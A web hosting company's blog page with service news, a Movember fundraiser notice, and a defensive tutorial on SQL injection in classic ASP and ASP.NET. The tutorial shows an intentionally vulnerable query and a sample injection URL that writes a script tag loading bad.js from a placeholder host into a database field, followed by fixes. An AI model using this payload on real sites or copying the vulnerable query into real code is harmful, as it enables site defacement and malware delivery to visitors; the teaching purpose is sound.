100% Australian Windows Web Hosting

Blog

What’s happening at StudioCoast

Hi there!

It's been a while since I last posted a Blog entry so I thought I would mention a few new things we have been rolling out:

  1. NEW Domain Name Registration system

    We've finished implementing a custom built Domain Registration system that allows management of both domains and web hosting from a single account.
    If you have a Domain Name registered with us, visit https://secure.hostcontrol.com.au/order/login.aspx and put your domain name into the Password Recovery section to receive instructions on how to include it in your existing Web Hosting account.

  2. ASP.NET 3.5 Web Hosting on IIS 7.0 (with SP1)

    This has been available for a while now but I thought I would mention it as customers can now request their sites be moved over to IIS 7.0 if they would like to try out the new features.
    If you would like to purchase a new Web Hosting account you can do so here:

    ASP.NET 3.5 Web Hosting

    During the order process you will be given the opportunity to request IIS 7.0 as all existing Web Hosting plans support it.

  3. Improved hostControl

    We've updated the interface to make it even easier to use and added a couple of features customers have requested:

    Default Documents – You can specify the home page for your web site and change the order pages are loaded here.
    Domain Registration – As mentioned above, this new feature allows you to change name servers, update contact details and process renewals for your domain names.

So there you have it! We are always interested in hearing your feedback, so if you have something to say send us an email or visit the Support page on our web site:

http://www.studiocoast.com.au/

Movember is here!

You know those normally hygienic people who for some strange reason decide to throw it out the window once a year and grow a hideous moustache?
Well believe it or not they haven't gone mad, they are supporting Movember which aims to raise funds and awareness for men's health.

This month my staff are on the ball, setting up a campaign where 5% of every Web Hosting or HyperVPS account purchased in the month of November will go straight to the Movember Foundation.
That money will then go on to either the Prostate Cancer Foundation of Australia or beyondblue: the national depression initiative. Two worthy causes I think you'll agree.

For full details you can visit our Movember website or head on over to the official web site for all the details.

Battling SQL Injection

"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?

SQL injection involves manipulating the variables sent to a web page so that attacker-supplied SQL becomes part of the queries the web site's code runs against the database.

There are a multitude of ways SQL Injection can be used for nefarious purposes, but today we are going to look at the method most commonly being used at the moment: inserting references to malicious JavaScript files into web sites.

Take the following simple example using ASP:

testpage.asp

<%
  ' The ID value comes straight from the query string and is pasted into the
  ' SQL text with no filtering or type check: this is the vulnerable version
  szQuery = "Select * From myTable Where ID = " & Request("ID")
%>

Because the Request("ID") variable isn't filtered or checked in any way, an attacker can manipulate the URL query string to append any SQL statements they like to the query, and so run whatever commands they like against the table.

So if they have a script at, say, http://testdomain.local/bad.js and myTable has a column called "Description" which is used to display information on the page, an attacker could use the following:

 

"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1"

This will update the record with ID = 1 to insert the JavaScript reference into the Description field, and every visitor who views that record will then load and run bad.js.

THIS IS BAD

So how does one fix it?

The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.

In ASP.NET however, the problem can be solved by using SqlCommand.Parameters to add each variable the query needs, so the value is sent to the database separately from the SQL text.

Then the SQL Query will look something like this:

Select * From myTable Where ID = @ID;

But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable stop-gap (though not completely foolproof).

<%
  ' Stop-gap for old code: strip the two characters the attack above relies on
  szID = Request("ID")
  szID = Replace(szID, "'", "")
  szID = Replace(szID, ";", "")

  ' The value is now wrapped in single quotes, so it is treated as a string literal
  szQuery = "Select * From myTable Where ID = '" & szID & "'"
%>

The above "escapes" potentially dangerous characters such as ' and ; by removing them from the variable completely. Because this is a blacklist of characters rather than a parameterised query, anything the list does not cover still gets through, which is why it is only a stop-gap.

Note that the above is only helpful if the ID variable is a string.

If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:

<%
  ' CInt only succeeds for a whole number; anything else raises a runtime error
  ' ("Type mismatch"), so the query below is only ever built from an integer
  iID = CInt(Request("ID"))

  szQuery = "Select * From myTable Where ID = " & iID

  …
%>

In the above example, if an attacker puts anything other than a whole number into ID, CInt raises a type-mismatch runtime error and the query is never run. You will probably want to catch that error, or test the value with IsNumeric first, so the visitor sees a proper message rather than a server error page.
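Putting the two fixes together in ASP.NET, as an added example that is not code from the original post: the SqlCommand.Parameters approach described above, combined with the same whole-number check that CInt gives classic ASP, done here with int.TryParse so a bad value gets a clean 400 response instead of a runtime error. The table and column names are the post's own; the connection-string name "myDb" in web.config is an assumption.

```csharp
// Added example, not the original post's code. Assumes a table myTable with an
// integer ID column and a string Description column (both from the post) and a
// connection string named "myDb" in web.config (placeholder name).
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public partial class TestPage : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // 1. Check the type first. ID is an integer column, so anything that is
        //    not a whole number is rejected before it gets anywhere near SQL.
        //    int.TryParse never throws, unlike CInt in classic ASP, so junk input
        //    cannot produce an unhandled error page.
        int id;
        if (!int.TryParse(Request.QueryString["ID"], out id))
        {
            Response.StatusCode = 400;   // Bad Request: nothing is queried
            Response.End();
            return;
        }

        string connStr = ConfigurationManager.ConnectionStrings["myDb"].ConnectionString;

        // 2. Use a parameter instead of string concatenation. The SQL text is fixed;
        //    the value travels separately, typed as Int, so the text
        //    "1;Update myTable ..." from the example above can never become SQL.
        using (SqlConnection conn = new SqlConnection(connStr))
        using (SqlCommand cmd = new SqlCommand(
                   "SELECT Description FROM myTable WHERE ID = @ID", conn))
        {
            cmd.Parameters.Add("@ID", SqlDbType.Int).Value = id;
            conn.Open();
            object result = cmd.ExecuteScalar();   // null when no row matches

            // 3. Encode on output as well, so that even a Description that was
            //    already poisoned with <script src=...> is shown as text, not run.
            string description = result == null ? "Not found" : result.ToString();
            Response.Write(HttpUtility.HtmlEncode(description));
        }
    }
}
```

The query text never changes whatever the visitor sends; the value is shipped to SQL Server on its own, typed as an integer, so the Update statement from the example above cannot become part of it. If you are stuck on classic ASP, the same parameter mechanism exists there through ADODB.Command and its CreateParameter method, so the "not always easy" option is at least available without rewriting the page in ASP.NET.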

So there you have it, SQL Injection is easy to avoid once you know how.


Copyright © 2002 - 2015 StudioCoast Pty Ltd   |   ABN: 53 143 039 070